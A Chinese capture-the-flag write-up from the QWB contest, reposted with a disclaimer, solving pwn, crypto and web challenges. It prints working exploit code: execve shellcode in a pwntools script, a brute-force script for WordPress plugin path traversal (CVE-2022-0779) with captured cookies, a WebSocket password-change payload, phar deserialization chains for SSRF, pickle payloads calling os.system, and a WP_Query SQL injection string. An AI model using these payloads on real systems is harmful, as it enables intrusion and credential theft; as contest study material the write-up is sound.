强网杯WriteUp|强网先锋 & Web

admin 2025年1月6日13:23:07评论5 views字数 14095阅读46分59秒阅读模式

强网先锋
  • rcefile

www.zip源码泄露。
发现黑名单中少了phar后缀,非预期上传phar直接解析为php了。
强网杯WriteUp|强网先锋 & Web
强网杯WriteUp|强网先锋 & Web
  • polydiv

# def proof_of_work(sh):
#     sh.recvuntil("XXXX+")
#     suffix = sh.recvuntil(')').decode("utf8")[:-1]
#     log.success(suffix)
#     sh.recvuntil("== ")
#     cipher = sh.recvline().strip().decode("utf8")
#     proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==  cipher, string.ascii_letters + string.digits, length=4, method='fixed')
#     sh.sendlineafter("Give me XXXX: ", proof)

from Crypto.Util.number import *
from hashlib import *
from pwn import *

sh=remote()

sh.recvuntil("XXXX+")
suffix = sh.recvuntil(')').decode("utf8")[:-1]

log.success(suffix)
sh.recvuntil("== ")
table = string.ascii_letters + string.digits
cipher = sh.recvline().strip().decode("utf8")
for a in table:
for b in table:
for c in table:
for d in table:
              x = a+b+c+d
if sha256((x + suffix).encode()).hexdigest() ==  cipher:
                  proof = x
                  log.success(proof)
                  sh.sendlineafter("Give me XXXX: ", proof)

R.<x>= Zmod(2)[]
for _ in range(40):
    sh.recvuntil("r(x) = ")
    rx = eval(sh.recvuntil("n")[:-1].replace(b"^",b"**"))
    sh.recvuntil("a(x) = ")
    ax = eval(sh.recvuntil("n")[:-1].replace(b"^",b"**"))
    sh.recvuntil("c(x) = ")
    cx = eval(sh.recvuntil("n")[:-1].replace(b"^",b"**"))
    sh.recvuntil("b(x) = ")
    sh.sendline(str((rx-cx)/ax))

sh.interactive()

  • ASR

# from Crypto.Util.number import getPrime
# from secret import falg
# pad = lambda s:s + bytes([(len(s)-1)%16+1]*((len(s)-1)%16+1))

# n = getPrime(128)**2 * getPrime(128)**2 * getPrime(128)**2 * getPrime(128)**2
# e = 3

# flag = pad(flag)
# print(flag)
# assert(len(flag) >= 48)
# m = int.from_bytes(flag,'big')
# c = pow(m,e,n)

# print(f'n = {n}')
# print(f'e = {e}')
# print(f'c = {c}')

# '''
from functools import reduce
=8250871280281573979365095715711359115372504458973444367083195431861307534563246537364248104106494598081988216584432003199198805753721448450911308558041115465900179230798939615583517756265557814710419157462721793864532239042758808298575522666358352726060578194045804198551989679722201244547561044646931280001
=3
=945272793717722090962030960824180726576357481511799904903841312265308706852971155205003971821843069272938250385935597609059700446530436381124650731751982419593070224310399320617914955227288662661442416421725698368791013785074809691867988444306279231013360024747585261790352627234450209996422862329513284149
P1 =223213222467584072959434495118689164399
P2 =218566259296037866647273372633238739089
P3 =260594583349478633632570848336184053653
P4 =225933944608558304529179430753170813347
assert n == (P1*P2*P3*P4)**2
phi = (P3-1)*(P1-1)*P3*P1
from Crypto.Util.number import *
print(GCD(e,phi))

= inverse(e,phi)

from sympy import *
# m2 = nthroot_mod(c,3,P2,True)
# print(m2)
# m2 = nthroot_mod(c,3,P4,True)
# print(m2)
=50285288042907373014089492494812223136212714158049271523227438161885132141972
m1s=[536612649025125756442163498276399907554017009972585088360569997378772209006159183122833201520722281740271702531008]
m2s = [439729196038496827809903608178394603448413205552544947252133292886704218379697828969479259149226856141068289169207]
def CRT(ai, mi):
assert (reduce(GCD,mi)==1)
assert (isinstance(mi, list) and isinstance(ai, list))
    M = reduce(lambda x, y: x * y, mi)
    ai_ti_Mi = [a * (M // m) * inverse(M // m, m) for (m, a) in zip(mi, ai)]
return reduce(lambda x, y: x + y, ai_ti_Mi) % M
for m1 in m1s:
for m2 in m2s:
try:
           print(long_to_bytes(CRT([int(m1),int(m2),m],[int(P2),int(P4),int(P1*P3)])))
exceptException as e:
           print(str(e))

  • WP-UM

CVE-2022-0779
https://wpscan.com/vulnerability/9d4a3f09-b011-4d87-ab63-332e505cf1cd
考察这个CVE,这个CVE能够判断某个文件在不在这个服务器上,虽然很鸡肋但是结合题目提示,密码和用户名就就放在服务器根目录的/usernamepassword同时,并且以如下图命名规则:
强网杯WriteUp|强网先锋 & Web
利用该漏洞就可以直接将账户密码爆出来,同时我们需要注意的是我们需要注册一个新的用户,在上传时候抓包将nonce获取到:
强网杯WriteUp|强网先锋 & Web
POC如下:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: eci-2ze7r7wnzasxlkt9i15e.cloudeci1.ichunqiu.com
Cookie: wordpress_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7Cb8fd9fb9bdedaff6d5a4880dd894993f7a52f07de0828302dde18f18b6b2f9ce; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1658212074,1658628132,1659144034; wordpress_logged_in_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7C9ebbfce6203217cd1cae1cc6dba7c268674cbdf4003af9f9623dc7548ae197f1
Content-Type: application/x-www-form-urlencoded
Content-Length: 159

field_name=test&filepath=/../../../../../../../../username/1M&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=1d833af826&is_ajax=true

如果文件存在则会返回Remove如图:
强网杯WriteUp|强网先锋 & Web
据此编写脚本:
import requests
tables =r'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_{}-'
url ="http://eci-2ze7r7wnzasxlkt9i15e.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
headers = {
'Cookie':'wordpress_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7Cb8fd9fb9bdedaff6d5a4880dd894993f7a52f07de0828302dde18f18b6b2f9ce; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1658212074,1658628132,1659144034; wordpress_logged_in_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7C9ebbfce6203217cd1cae1cc6dba7c268674cbdf4003af9f9623dc7548ae197f1'}
flag =""
for i in range(1,16):
for t in tables:
       data={
'field_name':'test'
           ,'filepath':'/../../../../../../../../password/%s'%(str(i)+t)
           ,'field_id':'um_field_4'
           ,'form_key':'Upload'
           ,'action':'um_show_uploaded_file'
           ,'pf_nonce':'1d833af826'
           ,'is_ajax':'true'
       }
       print(str(i)+t)
       r = requests.post(url,data=data,headers=headers)
if"Remove"in r.text:
           flag = flag +t
           print(flag)
break
可以得到账号密码分别是:MaoGePaMaoMaoGeYaoQiFeiLa
强网杯WriteUp|强网先锋 & Web
登录后台直接在主题编辑器中写马:
强网杯WriteUp|强网先锋 & Web
搜一下最近100分钟被修改过的文件:find / -type f -mmin -100
强网杯WriteUp|强网先锋 & Web
读取即可得到flag。
  • devnull

from pwn import*
context.log_level=True

io=process('./devnull')
#io=remote('182.92.161.17',16302)
#gdb.attach(io,'b *0x40145c')
#raw_input()

io.sendlineafter('filename','b'*0x1f)

payload='a'*0x14+p64(0x3fe100)+p64(0x3fe118)+p64(0x401350)
io.sendafter('discard',payload)


shellcode = "x31xc0x48xbbxd1x9dx96x91xd0x8cx97xffx48xf7xdbx53x54x5fx99x52x57x54x5exb0x3bx0fx05"
payload=p64(0x3fe000)
payload+='a'*0x18+p64(0x4012D0)+'a'*8+p64(0x3fe138)
payload+=shellcode
io.sendafter('data',payload)

io.sendline("/bin/shx00")
io.recvuntil("n")
io.sendline("cat ./flag 1>&2")
io.interactive()

io.interactive()

 Web   
  • babyweb

查看源码:
var ws = null;
var url = "ws://" + window.location.host + "/bot";
命令是通过ws发给bot,可以修改管理员密码,类似csrf的操作:
<script>
function wsk(){
        ws = new WebSocket("ws://127.0.0.1:8888/bot");
        ws.onopen = function(event){
        var msg = "changepw 123456";
        ws.send(msg);
        }
}
wsk();
</script>
购买hint获取源码,利用pythongolang中代码处理json的差异,传入同键值json造成逻辑购买成立。
{
"product":[{"id":1,"num":0},{"id":2,"num":0}],
"product":[{"id":1,"num":0},{"id":2,"num":1}]
}
  • easyweb

查看源码找到一个读取文件的点
<formaction="index.php"method="post"enctype="multipart/form-data"><inputtype="file"name="file"id="file"><br><inputtype="submit"name="submit"value="提交"><br><ahref="showfile.php?f=./demo.png">查看照片</a>

</form>

不允许直接读文件
<pclass='tip'>no permission, you can only see string 'demo' and 'guest'</p>
Payload:
/showfile.php?f=demo/../../../../var/www/html/index.php
<form action="index.php" method="post" enctype="multipart/form-data"><input type="file" name="file" id="file"><br><input type="submit" name="submit" value="提交"><br><a href="showfile.php?f=./demo.png">查看照片</a>

<?php    $upload=md5("2022qwb".$_SERVER['REMOTE_ADDR']);@mkdir($upload,0333,true);if(isset($_POST['submit'])) {        include'upload.php';    }    ?>

</form>

showfile.php
<?phperror_reporting(0);require_once('class.php');$filename=$_GET['f'];

if(preg_match("/http|https|bzip2|gopher|dict|zlib|data|input|%00/i",$filename)){    die("nop");}else{    if(isset($_SESSION)){        $show=newAdminShow($filename);$show->show();    }else{        if(preg_match('/guest|demo/i',$filename)) {            $show=newGuestShow($filename);$show->show();        }else{            die("<p class='tip'>no permission, you can only see string 'demo' and 'guest'</p>");        }    }}?>

upload.php
<?phperror_reporting(0);require_once('class.php');

if(isset($_SESSION)){    if(isset($_GET['fname'])?!empty($_GET['fname']):FALSE){        $_FILES["file"]["name"=$_GET['fname'];    }    $upload=newUpload();$upload->upload();}else {    die("<p class='tip'>guest can not upload file</p>");}?>

class.php
<?phpclassUpload {    public$file;public$filesize;public$date;public$tmp;function __construct(){        $this->file=$_FILES["file"];    }    function do_upload() {        $filename=session_id().explode(".",$this->file["name"])[0].".jpg";if(file_exists($filename)) {            unlink($filename);        }        move_uploaded_file($this->file["tmp_name"],md5("2022qwb".$_SERVER['REMOTE_ADDR'])."/".$filename);echo'upload  '."./".md5("2022qwb".$_SERVER['REMOTE_ADDR'])."/".$this->e($filename).' success!';    }    function e($str){        returnhtmlspecialchars($str);    }    function upload() {        if($this->check()) {            $this->do_upload();        }    }    function __toString(){        return$this->file["name"];    }    function __get($value){        $this->filesize->$value=$this->date;echo$this->tmp;    }    function check() {        $allowed_types=array("jpg","png","jpeg");$temp=explode(".",$this->file["name"]);$extension=end($temp);if(in_array($extension,$allowed_types)) {            returntrue;        }        else {            echo'Invalid file!';returnfalse;        }    }}

classGuestShow{    public$file;public$contents;publicfunction __construct($file)    {

$this->file=$file;    }    function __toString(){        $str=$this->file->name;return"";    }    function __get($value){        return$this->$value;    }    function show()    {        $this->contents =file_get_contents($this->file);$src="data:jpg;base64,".base64_encode($this->contents);echo"<img src={$src} />";    }    function __destruct(){        echo$this;    }}

classAdminShow{    public$source;public$str;public$filter;publicfunction __construct($file)    {        $this->source =$file;$this->schema ='file:///var/www/html/';    }    publicfunction __toString()    {        $content=$this->str[0]->source;$content=$this->str[1]->schema;return$content;    }    publicfunction __get($value){        $this->show();return$this->$value;    }    publicfunction __set($key,$value){        $this->$key=$value;    }    publicfunction show(){        if(preg_match('/usr|auto|log/i',$this->source))        {            die("error");        }        $url=$this->schema .$this->source;$curl=curl_init();curl_setopt($curl,CURLOPT_URL,$url);curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);curl_setopt($curl,CURLOPT_HEADER,1);$response=curl_exec($curl);curl_close($curl);$src="data:jpg;base64,".base64_encode($response);echo"<img src={$src} />";

    }    publicfunction __wakeup()    {        if ($this->schema !=='file:///var/www/html/') {            $this->schema ='file:///var/www/html/';        }        if ($this->source !=='admin.png') {            $this->source ='admin.png';        }    }}

意思可能是通过构造pop链去打ssrf
guest不允许上传,增加了cookie name="PHP_SESSION_UPLOAD_PROGRESS"
构造pop链条
<?phpclassGuestShow{    public$file;public$contents;publicfunction __construct($file)    {
$this->file=$file;    }}

classAdminShow{    public$source;public$str;public$filter;publicfunction __construct($file)    {        $this->source =$file;$this->schema ='file://';    }}@unlink("test.phar");$phar=new Phar("test.phar");//后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>");//设置stub$o=newGuestShow(newAdminShow("/proc/net/tcp"));$phar->setMetadata($o);//将自定义的meta-data存入manifest$phar->addFromString("test.txt","test");//添加要压缩的文件$phar->stopBuffering();

生成phar,修改为 demo.jpg,上传成功后,可以绕过检测,直接读到admin.png
/showfile.php?f=phar://./xxxx/demo1.jpg
需要绕过wakeup
publicfunction __wakeup()    {        if ($this->schema !=='file:///var/www/html/') {            $this->schema ='file:///var/www/html/';        }        if ($this->source !=='admin.png') {            $this->source ='admin.png';        }    }
ssrf的参数为 $url = $this->schema . $this->source;
修改成员参数数量绕过wakeup,但是需要重新签名phar文件
from hashlib import sha1

file = open("test.phar","rb").read()text = file[:-28]  #读取开始到末尾除签名外内容last = file[-8:]   #读取最后8位的GBMB和签名flagnew_file = text+sha1(text).digest() + last  #生成新的文件内容,主要是此时Sha1正确了。open("demo7.jpg","wb").write(new_file)

 /proc/net/tcp ,发现10.10.10.10:80,存在一个ssrf
<?php
//内网资源阅读器-测试机
//配置信息请看phpinfo.php

highlight_file(__FILE__);

if (isset($_GET['url'])){    $link=$_GET['url'];$curlobj=curl_init();curl_setopt($curlobj,CURLOPT_POST,0);curl_setopt($curlobj,CURLOPT_URL,$link);curl_setopt($curlobj,CURLOPT_RETURNTRANSFER,1);$result=curl_exec($curlobj);curl_close($curlobj);

echo$result;}

if($_SERVER['REMOTE_ADDR']==='10.10.10.101'||$_SERVER['REMOTE_ADDR']==='100.100.100.101'){    system('cat /flag');die();}

?>

<?phpclassGuestShow{    public$file;public$contents;publicfunction __construct($file)    {
$this->file=$file;    }}

classAdminShow{    public$source;public$str;public$filter;publicfunction __construct($file)    {        $this->source =$file;$this->schema ='http://';    }}@unlink("test.phar");$phar=new Phar("test.phar");//后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>");//设置stub$o=newGuestShow(newAdminShow("10.10.10.10:80/?url=file:///flag"));$phar->setMetadata($o);//将自定义的meta-data存入manifest$phar->addFromString("test.txt","test");//添加要压缩的文件$phar->stopBuffering();

  • crash

给了源码,balancer可以pickle反序列化,同时只是过滤了R,直接绕过即可。
(S'whoami'iossystem.
题目描述说flag504页面。
服务器是nginx启动的,504是由nginx超时主动断开时返回,但sleep过长会导致502,因此可以利用多个sleep,使服务器不产生502的情况下,最后一个包的请求超过nginx的请求时长导致504.
cookie处设置userdata为如下的base64
(cossystemS'sleep 10'o.
多个包同时发送,在最后几个包中可以得到504页面。
  • easylogin

wp_query sql注入漏洞:
action=asssss&query_vars[tax_query][1][field]=term_taxonomy_id&query_vars[tax_query][1][include_children]=1&query_vars[tax_query][1][terms][1]=1)+or+updatexml(0x7e,concat(1,database()),0x7e)#
注入8888端口的站获取密码,不过解密失败。
8888端口为moodle,通过在本地安装后查看数据库发现密码无法解密,不过注意到数据库中有一个表名为mdl_sessions的表,里面存有session,通过上车获取其他人的session
强网杯WriteUp|强网先锋 & Web
通过github搜索到相关插件,直接调用rce
https://github.com/HoangKien1020/Moodle_RCEdomain/blocks/rce/lang/en/block_rce.php?cmd=id
       

原文始发于微信公众号(山石网科安全技术研究院):强网杯WriteUp|强网先锋 & Web

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月6日13:23:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   强网杯WriteUp|强网先锋 & Webhttps://cn-sec.com/archives/1216216.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息